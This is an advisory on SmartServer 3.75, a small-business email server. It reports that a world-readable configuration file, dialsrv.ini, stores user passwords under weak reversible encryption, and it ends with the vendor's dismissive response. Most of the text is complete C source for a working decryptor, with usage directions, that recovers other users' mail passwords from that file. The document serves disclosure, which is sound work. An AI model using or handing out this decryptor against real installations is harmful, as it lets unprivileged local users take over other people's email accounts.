COMMAND
SmartServer
SYSTEMS AFFECTED
SmartServer 3.75 (others?)
PROBLEM
Steven Alexander found following. SmartServer3 (SS3) is a small
business email server from NetCPlus. It installs by default in
C:\Program Files\smartserver3\ . In this folder it stores a
configuration file called 'dialsrv.ini' . This file is accessible
to all authenticated users(authenticated to Windows) and contains
entries for every user which include their weakly encrypted
password. An entry for a user 'Carl' might look like this:
[USER1]
realname=Carl Jones
id=Carl
dir=CARL
pw=~:kC@nD3~:
extml=0
alertport=
alert=
UserActive=1
MailLimit=0
MailMAxWarn=0
MailMaxSize=20
The password encryption scheme is weak. The encryption of the
password depends only on the password entered and on the first
letter of the POP userID which is given in the entry "dir=CARL".
The attached source is the final copy of the code that used while
dismantling the password scheme that is used. It can decrypt a
password of up to 8 characters in length (for shorter passwords,
ignore the extra characters). If you need to decrypt a password
longer than 8 characters, run the program twice and enter the
characters after 8 as a new series (9 would be 1, 10 would be 2,
etc). Don't forget to enter the first letter of the username into
the program as well.
Though it has some other strange properties, the scheme works by
adding a position-specific value to each character of the
password. Any character that is the same as the first character
of the username has a default encryption. For instance, the user
BOB with the password 'Book' will have the same encrypted
character for the first letter of his password as the user CARL
with the password 'Catfish'. Look at the code for more details.
A legitimate administrator can see any users password after
logging into the SS3 console by editing a user and unchecking
the 'hide password' box.
#include <stdio.h>
#define DIGIT 0
#define UPPER 1
#define LOWER 2
#define DEFAULT 3
void main() {
unsigned char start_table[4][8] = {
{ 0x30, 0x4a, 0x7b, 0x53, 0x50, 0x7e, 0x54, 0x43 },
{ 0x41, 0x5b, 0x2e, 0x64, 0x61, 0x31, 0x65, 0x54 },
{ 0x60, 0x7a, 0x4d, 0x25, 0x22, 0x50, 0x26, 0x73 },
{ 0x7e, 0x3a, 0x6b, 0x43, 0x40, 0x6e, 0x44, 0x33} };
unsigned char uname = 0x46; /* Just the first character from DIR= entry */
unsigned char hash[8] = { 'E', '1', 'U', '0', 't', 'b', '*', '&' } ;
unsigned char pass[8];
unsigned char i;
unsigned char range;
if(uname >= 0x30 && uname <=39) {
for(i=0;i<=7;i++) {
hash[i]+=1; }
}
for(i=0;i<8;i++) {
if(hash[i] == start_table[DEFAULT][i]) {
pass[i] = uname;
continue; }
range=LOWER; /* hash values wrap to 0x21 after 0x7e */
if(hash[i] >= start_table[DIGIT][i] && hash[i] <= (start_table[DIGIT][i] + 0x0a))
range = DIGIT;
if(hash[i] >= start_table[UPPER][i] && hash[i] <= (start_table[UPPER][i] + 0x1a))
range=UPPER;
if(hash[i] >= start_table[LOWER][i] && hash[i] <= (start_table[LOWER][i] + 0x1a))
range=LOWER;
if(range==DIGIT) {
if(i==2 || i==5) {
if(hash[i] < 0x73) {
hash[i] = hash[i] + 0x5e; } }
pass[i] = ( hash[i] - start_table[DIGIT][i] ) + 0x30; }
if(range==UPPER) {
pass[i] = ( hash[i] - start_table[UPPER][i] ) + 0x41;
if(pass[i] >= uname)
pass[i]+=1; }
if(range==LOWER) {
if(i==1 || i ==7) {
if(hash[i] < 0x73) {
hash[i] = hash[i] + 0x5e; } }
pass[i] = ( hash[i] - start_table[LOWER][i] ) + 0x61; }
}
printf("The password is:\n\t");
for(i=0;i<8;i++) {
printf("%c ", pass[i]);
}
printf("\n");
}
SOLUTION
The vendor was contacted about this problem a couple of weeks
ago, they responded with insults and implied threats. They
maintain that good encryption is not necessary for the
environments in which their product is used. Further, they insist
that they pitch their product for use in businesses and that the
email contained in a business user's mail box is only of interest
to that person--Yes, they really did say that.